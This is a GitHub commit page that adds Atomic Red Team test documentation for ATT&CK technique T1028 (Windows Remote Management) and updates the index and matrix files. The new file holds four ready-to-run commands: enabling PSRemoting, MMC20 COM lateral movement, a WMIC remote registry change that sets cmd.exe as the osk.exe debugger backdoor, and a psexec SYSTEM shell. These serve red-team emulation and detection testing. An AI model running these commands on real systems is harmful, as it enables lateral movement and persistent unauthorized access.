Skip to content

Commit

Permalink
Generate docs from job=validate_atomics_generate_docs branch=T1028
Browse files Browse the repository at this point in the history
  • Loading branch information
CircleCI Atomic Red Team doc generator committed May 25, 2018
1 parent ff46dfd commit 46d1b8f
Show file tree
Hide file tree
Showing 5 changed files with 126 additions and 8 deletions.
102 changes: 102 additions & 0 deletions atomics/T1028/T1028.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,102 @@
# T1028 - Windows Remote Management
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1028)
<blockquote>Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the <code>winrm</code> command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)

Detection: Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.

Platforms: Windows

Data Sources: File monitoring, Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring

Permissions Required: User, Administrator

System Requirements: WinRM listener turned on and configured on remote system

Remote Support: Yes</blockquote>

## Atomic Tests

- [Atomic Test #1 - Enable Windows Remote Management](#atomic-test-1---enable-windows-remote-management)

- [Atomic Test #2 - PowerShell Lateral Movement](#atomic-test-2---powershell-lateral-movement)

- [Atomic Test #3 - WMIC Process Call Create](#atomic-test-3---wmic-process-call-create)

- [Atomic Test #4 - Psexec](#atomic-test-4---psexec)


<br/>

## Atomic Test #1 - Enable Windows Remote Management
Powershell Enable WinRM

**Supported Platforms:** Windows


#### Run it with `powershell`!
```
powershell Enable-PSRemoting -Force
```
<br/>
<br/>

## Atomic Test #2 - PowerShell Lateral Movement
Powershell lateral movement using the mmc20 application com object

Reference:

https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/

**Supported Platforms:** Windows


#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computername | Name of Computer | string | computer1|

#### Run it with `command_prompt`!
```
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","${computername}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```
<br/>
<br/>

## Atomic Test #3 - WMIC Process Call Create
Utilize WMIC to start remote process

**Supported Platforms:** Windows


#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | String | DOMAIN\Administrator|
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|

#### Run it with `command_prompt`!
```
wmic /user:${user_name} /password:${password} /node:${computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
```
<br/>
<br/>

## Atomic Test #4 - Psexec
Utilize psexec to start remote process

**Supported Platforms:** Windows


#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | String | DOMAIN\Administrator|
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|

#### Run it with `command_prompt`!
```
psexec \\host -u domain\user -p password -s cmd.exe
```
<br/>
12 changes: 10 additions & 2 deletions atomics/index.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -358,7 +358,11 @@
- Atomic Test #2: WMI Reconnaissance Processes [windows]
- Atomic Test #3: WMI Reconnaissance Software [windows]
- Atomic Test #4: WMI Reconnaissance List Remote Services [windows]
- [T1028 Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1028 Windows Remote Management](./T1028/T1028.md)
- Atomic Test #1: Enable Windows Remote Management [windows]
- Atomic Test #2: PowerShell Lateral Movement [windows]
- Atomic Test #3: WMIC Process Call Create [windows]
- Atomic Test #4: Psexec [windows]

# lateral-movement
- [T1155 AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
Expand All @@ -383,7 +387,11 @@
- [T1072 Third-party Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1077 Windows Admin Shares](./T1077/T1077.md)
- Atomic Test #1: TODO [windows]
- [T1028 Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1028 Windows Remote Management](./T1028/T1028.md)
- Atomic Test #1: Enable Windows Remote Management [windows]
- Atomic Test #2: PowerShell Lateral Movement [windows]
- Atomic Test #3: WMIC Process Call Create [windows]
- Atomic Test #4: Psexec [windows]

# collection
- [T1123 Audio Capture](./T1123/T1123.md)
Expand Down
4 changes: 2 additions & 2 deletions atomics/matrix.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,7 +17,7 @@
| | [Mshta](./T1170/T1170.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Launch Daemon](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Deobfuscate/Decode Files or Information](./T1140/T1140.md) | [LLMNR/NBT-NS Poisoning](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [System Information Discovery](./T1082/T1082.md) | [Taint Shared Content](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | [Port Knocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| | [PowerShell](./T1086/T1086.md) | [Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [New Service](./T1050/T1050.md) | [Disabling Security Tools](./T1089/T1089.md) | [Network Sniffing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [System Network Configuration Discovery](./T1016/T1016.md) | [Third-party Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | [Remote Access Tools](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| | [Regsvcs/Regasm](./T1121/T1121.md) | [External Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Path Interception](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exploitation for Defense Evasion](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Password Filter DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [System Network Connections Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Windows Admin Shares](./T1077/T1077.md) | | | [Remote File Copy](./T1105/T1105.md) |
| | [Regsvr32](./T1117/T1117.md) | [File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Plist Modification](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Private Keys](./T1145/T1145.md) | [System Owner/User Discovery](./T1033/T1033.md) | [Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | [Standard Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| | [Regsvr32](./T1117/T1117.md) | [File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Plist Modification](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Private Keys](./T1145/T1145.md) | [System Owner/User Discovery](./T1033/T1033.md) | [Windows Remote Management](./T1028/T1028.md) | | | [Standard Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| | [Rundll32](./T1085/T1085.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Port Monitors](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [File Deletion](./T1107/T1107.md) | [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [System Service Discovery](./T1007/T1007.md) | | | | [Standard Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| | [Scheduled Task](./T1053/T1053.md) | [Hooking](./T1179/T1179.md) | [Process Injection](./T1055/T1055.md) | [File System Logical Offsets](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Securityd Memory](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [System Time Discovery](./T1124/T1124.md) | | | | [Standard Non-Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| | [Scripting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Hypervisor](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [SID-History Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Gatekeeper Bypass](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Two-Factor Authentication Interception](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | [Uncommonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
Expand All @@ -31,7 +31,7 @@
| | [Trusted Developer Utilities](./T1127/T1127.md) | [Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Indicator Removal on Host](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | [User Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Login Item](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Indirect Command Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | [Windows Management Instrumentation](./T1047/T1047.md) | [Logon Scripts](./T1037/T1037.md) | | [Install Root Certificate](./T1130/T1130.md) | | | | | | |
| | [Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Modify Existing Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [InstallUtil](./T1118/T1118.md) | | | | | | |
| | [Windows Remote Management](./T1028/T1028.md) | [Modify Existing Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [InstallUtil](./T1118/T1118.md) | | | | | | |
| | | [Netsh Helper DLL](./T1128/T1128.md) | | [LC_MAIN Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [New Service](./T1050/T1050.md) | | [Launchctl](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Office Application Startup](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Masquerading](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
Expand Down
12 changes: 10 additions & 2 deletions atomics/windows-index.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -259,7 +259,11 @@
- [T1072 Third-party Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1077 Windows Admin Shares](./T1077/T1077.md)
- Atomic Test #1: TODO [windows]
- [T1028 Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1028 Windows Remote Management](./T1028/T1028.md)
- Atomic Test #1: Enable Windows Remote Management [windows]
- Atomic Test #2: PowerShell Lateral Movement [windows]
- Atomic Test #3: WMIC Process Call Create [windows]
- Atomic Test #4: Psexec [windows]

# collection
- [T1123 Audio Capture](./T1123/T1123.md)
Expand Down Expand Up @@ -345,7 +349,11 @@
- Atomic Test #2: WMI Reconnaissance Processes [windows]
- Atomic Test #3: WMI Reconnaissance Software [windows]
- Atomic Test #4: WMI Reconnaissance List Remote Services [windows]
- [T1028 Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1028 Windows Remote Management](./T1028/T1028.md)
- Atomic Test #1: Enable Windows Remote Management [windows]
- Atomic Test #2: PowerShell Lateral Movement [windows]
- Atomic Test #3: WMIC Process Call Create [windows]
- Atomic Test #4: Psexec [windows]

# command-and-control
- [T1043 Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
Expand Down
Loading

0 comments on commit 46d1b8f

Please sign in to comment.